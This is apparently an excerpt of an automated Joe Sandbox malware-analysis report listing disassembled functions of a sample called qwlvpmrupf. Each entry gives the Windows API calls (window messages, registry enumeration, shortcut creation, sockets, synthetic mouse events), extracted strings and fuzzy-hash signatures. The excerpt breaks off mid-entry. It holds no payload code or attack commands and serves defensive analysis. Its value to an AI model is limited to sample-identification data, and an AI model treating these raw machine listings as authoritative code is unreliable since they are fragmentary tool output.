                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 4a5e449ae6864fddb5caa70b178adca7e640c3e90ceda4c8372b5540ee44f515
                                                • Instruction ID: 7a59bb39893f708c959736697922fd01c57bdcbb4bc15cb081164448ab3f50c0
                                                • Opcode Fuzzy Hash: 4a5e449ae6864fddb5caa70b178adca7e640c3e90ceda4c8372b5540ee44f515
                                                • Instruction Fuzzy Hash: B021B271500365ABDB359F6ADC04A9AB7E8EF55324F200B29FDE1E72E0D7B09891CB10
                                                APIs
                                                  • Part of subcall function 0037771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00377759
                                                  • Part of subcall function 0037771B: GetStockObject.GDI32(00000011), ref: 0037776D
                                                  • Part of subcall function 0037771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00377777
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00404A71
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00404A7E
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00404A89
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00404A98
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00404AA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: cc2dc0851706f258366917f28715ef2db1949015450b3c808b0981e4df824f71
                                                • Instruction ID: fadf9541b0c4c77dda25acfc06d4255b906661feff6ac3e932764a0c2d0ed32f
                                                • Opcode Fuzzy Hash: cc2dc0851706f258366917f28715ef2db1949015450b3c808b0981e4df824f71
                                                • Instruction Fuzzy Hash: 2F11B6B224021DBEEF119F64CC81EE77F9DEF08758F004121FB18A6190C6759C219BA8
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003DE23D
                                                • LoadStringW.USER32(00000000), ref: 003DE244
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003DE25A
                                                • LoadStringW.USER32(00000000), ref: 003DE261
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003DE2A5
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 003DE282
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 4072794657-3128320259
                                                • Opcode ID: 28541a11b3fb71b08b9fc596094a2a4d4d4c5ce410a1fa5812924024751b965f
                                                • Instruction ID: 0575b7a41e8b6733749281ee030731d53e205db6f7dd689a8a9abe101e699b67
                                                • Opcode Fuzzy Hash: 28541a11b3fb71b08b9fc596094a2a4d4d4c5ce410a1fa5812924024751b965f
                                                • Instruction Fuzzy Hash: 280136F6D002087FE711A7D4DE89EE7776CEB08304F0149A2B746F6141EA749E888B75
                                                APIs
                                                • __allrem.LIBCMT ref: 003A044A
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A0466
                                                • __allrem.LIBCMT ref: 003A047D
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A049B
                                                • __allrem.LIBCMT ref: 003A04B2
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A04D0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                                • Instruction ID: 5283cfc82b236e13ab0577d981c5384c44aea3a4a6ba6f00a6cc704fbbc93dd2
                                                • Opcode Fuzzy Hash: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                                • Instruction Fuzzy Hash: 50810876A007069BDB2A9F79CC81B6BB3E8EF46724F25452EF611DB6C1E770D9008B50
                                                APIs
                                                  • Part of subcall function 003F3AA6: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,003F1979,00000000,?,?,00000000), ref: 003F3AF2
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003F271D
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003F273E
                                                • WSAGetLastError.WSOCK32 ref: 003F274F
                                                • inet_ntoa.WSOCK32(?), ref: 003F27E9
                                                • htons.WSOCK32(?,?,?,?,?), ref: 003F2838
                                                • _strlen.LIBCMT ref: 003F2892
                                                  • Part of subcall function 003D4277: _strlen.LIBCMT ref: 003D4281
                                                  • Part of subcall function 003786FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0038C15A,?,?,?), ref: 0037871A
                                                  • Part of subcall function 003786FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0038C15A,?,?,?,?,0037AEB9,?,?), ref: 0037874D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                • String ID:
                                                • API String ID: 1923757996-0
                                                • Opcode ID: 3b293f90a4de06a1cfeef744a4e5221f199a83e1ff22a64c71e5dadeae499a44
                                                • Instruction ID: 3adb3c846538da3e836e68badd1612561811d70b8f0a4d5885212123cd62b280
                                                • Opcode Fuzzy Hash: 3b293f90a4de06a1cfeef744a4e5221f199a83e1ff22a64c71e5dadeae499a44
                                                • Instruction Fuzzy Hash: 6EA1DF31504305EFD326EF24C885E2B7BA8AF84314F54855CF69A9F2A2CB71ED46CB91
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00398669,00398669,?,?,?,003A67DF,00000001,00000001,8BE85006), ref: 003A65E8
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003A67DF,00000001,00000001,8BE85006,?,?,?), ref: 003A666E
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003A6768
                                                • __freea.LIBCMT ref: 003A6775
                                                  • Part of subcall function 003A3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00396A99,?,0000015D,?,?,?,?,003985D0,000000FF,00000000,?,?), ref: 003A3BE2
                                                • __freea.LIBCMT ref: 003A677E
                                                • __freea.LIBCMT ref: 003A67A3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: 0098200ebeee5c51b7b9fc14a888325932ce6a1d559099e8fbc913058da8c5d4
                                                • Instruction ID: 856ac43ad4b457821991cefb46a405910e4ac742564e61a4a8a49244addfd734
                                                • Opcode Fuzzy Hash: 0098200ebeee5c51b7b9fc14a888325932ce6a1d559099e8fbc913058da8c5d4
                                                • Instruction Fuzzy Hash: 3151F372610216AFDB278F64CC82EBF77AAEF46754F1A4228FC14DA150EB35DC44C6A0
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003FC00D,?,?), ref: 003FD314
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD350
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3C7
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3FD
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FC629
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003FC684
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FC6C9
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003FC6F8
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003FC752
                                                • RegCloseKey.ADVAPI32(?), ref: 003FC75E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                • String ID:
                                                • API String ID: 1120388591-0
                                                • Opcode ID: 8fe970ae6ad2da46ebe4ac4334e8dfe75eec2439d891b70d9a5e46c6c608c823
                                                • Instruction ID: 7624ee860736860d49cd909006aa94e7e1ec145f17077bf953ef798e947308c8
                                                • Opcode Fuzzy Hash: 8fe970ae6ad2da46ebe4ac4334e8dfe75eec2439d891b70d9a5e46c6c608c823
                                                • Instruction Fuzzy Hash: F4819D31218249AFD716DF24C984E3ABBF5BF84308F14955CF5998B2A2DB31ED09CB91
                                                APIs
                                                • VariantInit.OLEAUT32(00000035), ref: 003D0049
                                                • SysAllocString.OLEAUT32(00000000), ref: 003D00F0
                                                • VariantCopy.OLEAUT32(003D02F4,00000000), ref: 003D0119
                                                • VariantClear.OLEAUT32(003D02F4), ref: 003D013D
                                                • VariantCopy.OLEAUT32(003D02F4,00000000), ref: 003D0141
                                                • VariantClear.OLEAUT32(?), ref: 003D014B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCopy$AllocInitString
                                                • String ID:
                                                • API String ID: 3859894641-0
                                                • Opcode ID: 3011fb2ab0493e49964c59ef6d6cd003ac23837871e2adbd8505e71ac3e3464b
                                                • Instruction ID: baffafbb5fcf8c285301df6a9522875e3b5976873e2c0909c06325a02604774e
                                                • Opcode Fuzzy Hash: 3011fb2ab0493e49964c59ef6d6cd003ac23837871e2adbd8505e71ac3e3464b
                                                • Instruction Fuzzy Hash: D3512A36940310ABCF2AAB74B885B29B3B9EF46B10F14944BE905DF396DB709C44CB95
                                                APIs
                                                • _wcslen.LIBCMT ref: 003E6E36
                                                • CoInitialize.OLE32(00000000), ref: 003E6F93
                                                • CoCreateInstance.OLE32(00410CC4,00000000,00000001,00410B34,?), ref: 003E6FAA
                                                • CoUninitialize.OLE32 ref: 003E722E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: b6df3e94cf7b1b6f84cc07d4c577101de968f490095f5941f5ae0b658104c5b9
                                                • Instruction ID: b0f38673f7fd43b0e81584d9d0bdbbe2d739e9dfb5489f997486ce460885d614
                                                • Opcode Fuzzy Hash: b6df3e94cf7b1b6f84cc07d4c577101de968f490095f5941f5ae0b658104c5b9
                                                • Instruction Fuzzy Hash: AFD15A71508241AFC315EF24C881E6BB7E8FF98704F10896DF1998B2A2DB70ED05CB92
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,003CFB8F,00000000,?,?,00000000,?,003B39BC,00000004,00000000,00000000), ref: 00408BAB
                                                • EnableWindow.USER32(?,00000000), ref: 00408BD1
                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00408C30
                                                • ShowWindow.USER32(?,00000004), ref: 00408C44
                                                • EnableWindow.USER32(?,00000001), ref: 00408C6A
                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00408C8E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 890b24ccfd1d195d5347e41e57a4cd549068160922738ee5828ad3f128418d20
                                                • Instruction ID: 78d407a58d020cb44b421231c0ff584c9576a6e6b6f3888dc1e3a20363d4f38d
                                                • Opcode Fuzzy Hash: 890b24ccfd1d195d5347e41e57a4cd549068160922738ee5828ad3f128418d20
                                                • Instruction Fuzzy Hash: 6F416374605244AFDB15CF24CA89FA67BF0BB4A304F18417EF5886B3E2CB75A845CB58
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 003F2C45
                                                  • Part of subcall function 003EEE49: GetWindowRect.USER32(?,?), ref: 003EEE61
                                                • GetDesktopWindow.USER32 ref: 003F2C6F
                                                • GetWindowRect.USER32(00000000), ref: 003F2C76
                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003F2CB2
                                                • GetCursorPos.USER32(?), ref: 003F2CDE
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003F2D3C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                • String ID:
                                                • API String ID: 2387181109-0
                                                • Opcode ID: 6ba6e3df160770884a26d5eb4e0b28f6ec8fb22245a719ed8347c1153cef62db
                                                • Instruction ID: 91796ae1ee0a03f785350de2a91fc8dcf53fe915d30ded7177d1f8457039ecd7
                                                • Opcode Fuzzy Hash: 6ba6e3df160770884a26d5eb4e0b28f6ec8fb22245a719ed8347c1153cef62db
                                                • Instruction Fuzzy Hash: 9031F072905319ABD721DF54D944BAFB7A9FFC4314F000A2AF995A7280CB31E908CB92
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                • _wcslen.LIBCMT ref: 003E61D5
                                                • CoInitialize.OLE32(00000000), ref: 003E62EF
                                                • CoCreateInstance.OLE32(00410CC4,00000000,00000001,00410B34,?), ref: 003E6308
                                                • CoUninitialize.OLE32 ref: 003E6326
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 3172280962-24824748
                                                • Opcode ID: 67dc02376183bacd516602e285286979e55a7c47405ab0d82923c238ec9c28c6
                                                • Instruction ID: fbd217f7d2c264f55c823046f2921746003c675c6930b35874e810f11167bea7
                                                • Opcode Fuzzy Hash: 67dc02376183bacd516602e285286979e55a7c47405ab0d82923c238ec9c28c6
                                                • Instruction Fuzzy Hash: 8FD174716042209FC715EF26C485A2ABBF1FF99354F11895DF88A9B3A1CB31EC45CB92
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003D210F
                                                • UnloadUserProfile.USERENV(?,?), ref: 003D211B
                                                • CloseHandle.KERNEL32(?), ref: 003D2124
                                                • CloseHandle.KERNEL32(?), ref: 003D212C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 003D2135
                                                • HeapFree.KERNEL32(00000000), ref: 003D213C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: a31e7d55871d54b97637fda4d6b1175f856829bfc83a60c193cc3979ed543c6c
                                                • Instruction ID: 7c99a95aed06e9300b9d6ec19d08f10044890a60936634e945ffef8e4c867743
                                                • Opcode Fuzzy Hash: a31e7d55871d54b97637fda4d6b1175f856829bfc83a60c193cc3979ed543c6c
                                                • Instruction Fuzzy Hash: 1DE0E576804101BBDB012FF1EE0CD0ABF39FF49322B108230F225A6070CB329424DB98
                                                APIs
                                                  • Part of subcall function 00374154: _wcslen.LIBCMT ref: 00374159
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003DCEAE
                                                • _wcslen.LIBCMT ref: 003DCEF5
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003DCF5C
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003DCF8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default
                                                • String ID: 0
                                                • API String ID: 1227352736-4108050209
                                                • Opcode ID: 80d49ae59667c5658fcade78f9bceeda57c810d46a293dcbd2d64bbe14bb3df9
                                                • Instruction ID: 8fb99729e914ca6c8ae58b4e6829fb8f8f4272879d43157f05c257065f3931b5
                                                • Opcode Fuzzy Hash: 80d49ae59667c5658fcade78f9bceeda57c810d46a293dcbd2d64bbe14bb3df9
                                                • Instruction Fuzzy Hash: 0D5104B26343029FD7169F28E844BABB7EDAF85310F051A2EF895D6390DB70C904C752
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00404794
                                                • IsMenu.USER32(?), ref: 004047A9
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004047F1
                                                • DrawMenuBar.USER32 ref: 00404804
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert
                                                • String ID: 0
                                                • API String ID: 3076010158-4108050209
                                                • Opcode ID: b2e26cfcadab810ecaa5539f930b552b798797575beab309e919276033f9b94b
                                                • Instruction ID: 8a8759c9d2ddad781b1afa55d142ce996d1954650458d6a844061d51a00adf9f
                                                • Opcode Fuzzy Hash: b2e26cfcadab810ecaa5539f930b552b798797575beab309e919276033f9b94b
                                                • Instruction Fuzzy Hash: 22415CB9A00249EFDB20DF50D984AABB7B4FF85314F04852AFA05A7390C734ED54CB64
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003D26F6
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003D2709
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 003D2739
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
